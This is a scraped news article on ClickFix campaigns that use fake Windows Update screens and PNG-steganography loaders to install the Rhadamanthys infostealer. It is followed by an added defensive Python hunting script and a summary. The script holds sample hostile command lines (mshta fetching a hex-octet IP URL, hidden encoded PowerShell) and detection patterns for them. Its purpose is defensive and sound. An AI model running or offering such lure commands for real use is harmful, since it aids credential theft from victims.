Article Details

Scrape Timestamp (UTC): 2025-11-24 22:56:16.672

Source: https://www.theregister.com/2025/11/24/clickfix_attack_infostealers_images/

Original Article Text


Fresh ClickFix attacks use Windows Update trick-pics to steal credentials

Poisoned PNGs contain malicious code.

A fresh wave of ClickFix attacks is using fake Windows update screens to trick victims into downloading infostealer malware.

ClickFix is a type of social engineering technique that tricks users into running malicious commands on their own machines, typically using fake fixes or I-am-not-a-robot prompts. These types of attacks have surged over the past year, with both government-sponsored spies and cybercriminal gangs deploying this technique to deliver malware. According to Microsoft, ClickFix is now the most common initial access method for attackers.

Recent ClickFix attacks are moving away from the robot-check lures and instead using "highly convincing" phony Windows update screens, according to Huntress security analysts Ben Folland and Anna Pham.

In another new twist, the malware slingers use a steganographic loader to deliver infostealing malware, including Rhadamanthys, by encoding malicious code directly into the pixel data of PNG images and then using specific color channels to reconstruct and decrypt the malware in memory. This technique also helps the malicious payloads to evade signature-based detection.

Since early October, Huntress threat hunters have spotted a few clusters of activity using Windows Update as the ClickFix lure. One involved this IP address: 141.98.80[.]175, so defenders should keep an eye out for any traffic originating from that one.

These campaigns start with victims visiting a malicious website that causes their browsers to enter full-screen mode and display a blue Windows Update screen like this one shared on social media. If users fall for the scam, they’re urged to install a “critical security update” via the typical ClickFix pattern: open the Run prompt (Win+R), then paste and run the malicious command.

Running the command kicks off a multi-stage execution chain that begins with an mshta.exe command which contains a URL with an IP address, where the second octet is always hex-encoded. This runs PowerShell code that contains a .NET assembly, which is dynamically decrypted and reflectively loaded. And that leads to the deployment of another .NET payload: a steganographic loader that extracts Donut-packed shellcode hidden inside the pixel data of PNG images.

Both of these Windows Update ClickFix lures ultimately load Rhadamanthys infostealing malware on the victims' machines. That evil code swipes their login credentials.

Huntress doesn’t know who is behind these campaigns but noted the source code of the Windows Update lure site contains comments in Russian. Plus, the researchers conducted their analysis both before and after the Operation Endgame law enforcement takedowns announced November 13 that targeted the Rhadamanthys infrastructure.

"As of November 19, multiple active domains continue to host the Windows Update Lure page associated with the Rhadamanthys campaign," the Huntress duo wrote. "All of these lures point to the same hex-encoded URL structure previously linked to the deployment of Rhadamanthys, although it appears this payload is no longer being hosted."

Organizations can defend against ClickFix attacks by blocking the Windows Run box and training employees on how the ClickFix technique works: a real CAPTCHA or Windows Update will never require a user to paste and run commands. Additionally, use endpoint detection and response tools to monitor for explorer.exe spawning mshta.exe, powershell.exe, or other binaries with unexpected command lines.
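The two detection signals the article gives defenders (explorer.exe as the parent of mshta.exe or powershell.exe, and an mshta URL whose IP has a hex-encoded second octet) are easy to turn into a hunting rule over process-creation telemetry. The Run dialog is hosted by explorer.exe, so anything pasted into Win+R shows up with explorer.exe as its parent. The script below is an added example written for this page, not code from The Register, Huntress or Microsoft; the event records and field names (parent, image, cmdline) are constructed to resemble what an EDR exports, and the IP addresses come from the RFC 5737 documentation range rather than from the campaign.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events (not real telemetry). Field names
# are assumptions standing in for whatever an EDR or Sysmon pipeline emits.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://198.0x33.100.7/x"},            # hex second octet
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc QQBCAEMA"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n "C:\\Users\\a\\report.docx"'},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\inventory.ps1"},  # scheduled task
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad http://198.51.100.7/notes.txt"},        # plain IP, benign
]

# First-stage binaries the article names for this ClickFix chain.
LOLBINS = {"mshta.exe", "powershell.exe"}

# Dotted quad whose second octet is written in hex, e.g. 198.0x33.100.7.
# The article reports that the ClickFix mshta URLs always have this shape.
HEX_OCTET_IP = re.compile(r"\b\d{1,3}\.0x[0-9a-fA-F]{1,2}\.\d{1,3}\.\d{1,3}\b")

# mshta normally runs local .hta files; a remote URL on its command line is odd.
REMOTE_URL = re.compile(r"(?i)https?://")


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the list of reasons an event looks like a ClickFix first stage."""
    reasons = []
    parent = basename(event["parent"])
    child = basename(event["image"])
    cmd = event["cmdline"]

    # Signal 1: the Run box (explorer.exe) launching a scripting host directly.
    if parent == "explorer.exe" and child in LOLBINS:
        reasons.append(f"explorer.exe spawned {child}")

    # Signal 2: the hex-encoded-octet IP URL the campaign uses.
    if HEX_OCTET_IP.search(cmd):
        reasons.append("URL with hex-encoded second octet in command line")

    # Signal 3: mshta pointed at a remote URL instead of a local .hta file.
    if child == "mshta.exe" and REMOTE_URL.search(cmd):
        reasons.append("mshta.exe invoked with a remote URL")

    return reasons


def hunt(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Return (event index, reasons) for every event with at least one signal."""
    hits = []
    for idx, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            hits.append((idx, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in hunt(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {basename(ev['parent'])} -> {basename(ev['image'])}")
        for r in reasons:
            print(f"      - {r}")
```

Signal 1 on its own will fire on administrators who legitimately open PowerShell from the Run box, so treat a single reason as a hunting lead and two or more (for example explorer.exe spawning mshta.exe with a hex-octet URL) as something to alert on. The regex deliberately requires the `0x` prefix in the second octet only, matching the pattern the article describes; a plain dotted-quad URL, as in the notepad event, does not trigger it.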

Daily Brief Summary

MALWARE // ClickFix Attacks Exploit Fake Windows Updates to Deploy Infostealers

A surge in ClickFix attacks leverages fake Windows update screens to deceive users into downloading infostealer malware, primarily targeting login credentials.

This social engineering tactic has become the most prevalent initial access method for both state-sponsored and criminal cyber actors.

Attackers employ steganographic loaders, embedding malicious code in PNG images to evade signature-based detection, complicating traditional defense mechanisms.

Recent campaigns use a multi-stage execution chain initiated by deceptive prompts, leading to the deployment of Rhadamanthys malware.

Huntress analysts identified ongoing activity with domains hosting these lures, despite recent law enforcement actions targeting associated infrastructure.

Organizations are advised to block the Windows Run box, educate employees on ClickFix tactics, and utilize endpoint detection tools to identify suspicious activity.

The presence of Russian-language comments in the lure site code hints at potential origins, though the attackers remain unidentified.